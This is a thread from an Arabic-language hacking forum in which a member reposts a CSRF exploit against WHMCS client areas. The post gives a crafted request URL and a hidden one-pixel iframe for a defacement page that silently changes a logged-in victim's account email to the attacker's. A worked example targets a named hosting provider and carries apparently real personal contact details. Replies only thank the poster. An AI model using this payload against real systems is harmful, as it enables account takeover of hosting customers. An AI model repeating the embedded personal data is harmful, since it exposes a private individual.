1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : G.e.r.n.a.s | المشاهدات : 902 | الردود : 3
الوسوم:
حالة الموضوع:
مغلق
  1. G.e.r.n.a.s Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    32
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الوظيفة:
    مبرمج
    الإقامة:
    قائمة الابداع
    نظام التشغيل:
    Linux
    كود PHP:
    ################################################## #########################

    # Exploit Title: WHMCS [CSRF] All Versions (0day)
    # Team: MaDLeeTs
    # Software Link: http://www.whmcs.com
    # Version: All
    # Site: http://www.MaDLeeTs.com
    # Email: LeeTHaXorY7Mail.com

    #######################Video###################### #################

    http://vimeo.com/63686629

    ################################################## #########################

    https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname= Max&lastname=Fong&companyname=Antswork+Communicati ons+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=W ilayah+Persekutuan&postcode=57000&country=MY&phone number=0060390592663&paymentmethod=none&billingcid =0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpu r+Tel:+603.86560268+Fax:+603.8​6560768

    ########################iFrame Code To Add On Deface##############################

    <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

    Example:
    <
    IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname= Max&lastname=Fong&companyname=Antswork+Communicati ons+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1= B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2 F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&stat e=Wilayah+Persekutuan&postcode=57000&country=MY&ph onenumber=0060390592663&paymentmethod=none&billing cid=0&customfield%5B1%5D=max%40antswork.com&custom field%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&c ustomfield%5B4%5D=%2B603.90578663&customfield%5B5% 5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&cu stomfield%5B7%5D=&customfield%5B8%5D=&customfield% 5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lum pur+Tel%3A+603.86560268+Fax%3A​+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

    ################################################## #########################
    All you need to do is add it into your Deface page and make your target view the deface pageHe MUST loggin 1st into his clientarea in order to get his email updated.
    ################################################## #########################
    Greetz to H4x0rL1f3 KhantastiC HaXor H4x0r HuSsY b0x Invectus Shadow008 Neo HaXor Hitcher Dr.Z0mbie Hmei7 phpBugz MindCracker |
    c0rrupt r00x Pain006 Ment@l Mind M4DSh4k H1d@lG0 AlphaSky 3thicaln00b e0fx madc0de |
    makman DeaTh AnGeL Lnxr00t x3o-1337 Tor Demon T4p10N AL.MaX HaCkEr | | ThaRude ThaDark |
    Evil-DZ H3ll-dz Over-3xp1r3 Cyber Army Pakistan Cyber Army And All MaDLeeTs TeaM Members
    ################################################## #########################

    http://www.MaDLeeTs.com

    ################################################## #########################


    I hope my exploit would be addedThank you WHMCS CSRF Versions Vulnerability

     
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. ارهابي انا Developer

    الأنتساب:
    ‏25 مارس 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    أمام الجهاز 24 ساعة
    رد: WHMCS [CSRF] All Versions (0day)

    يعطيك العافيه يابطل واصل ..^^​
     
  4. mr.mourad <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏8 يوليو 2013
    المشاركات:
    170
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    رد: WHMCS [CSRF] All Versions (0day)

    يعطيك العافية اخي شكراً جزيلاً :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة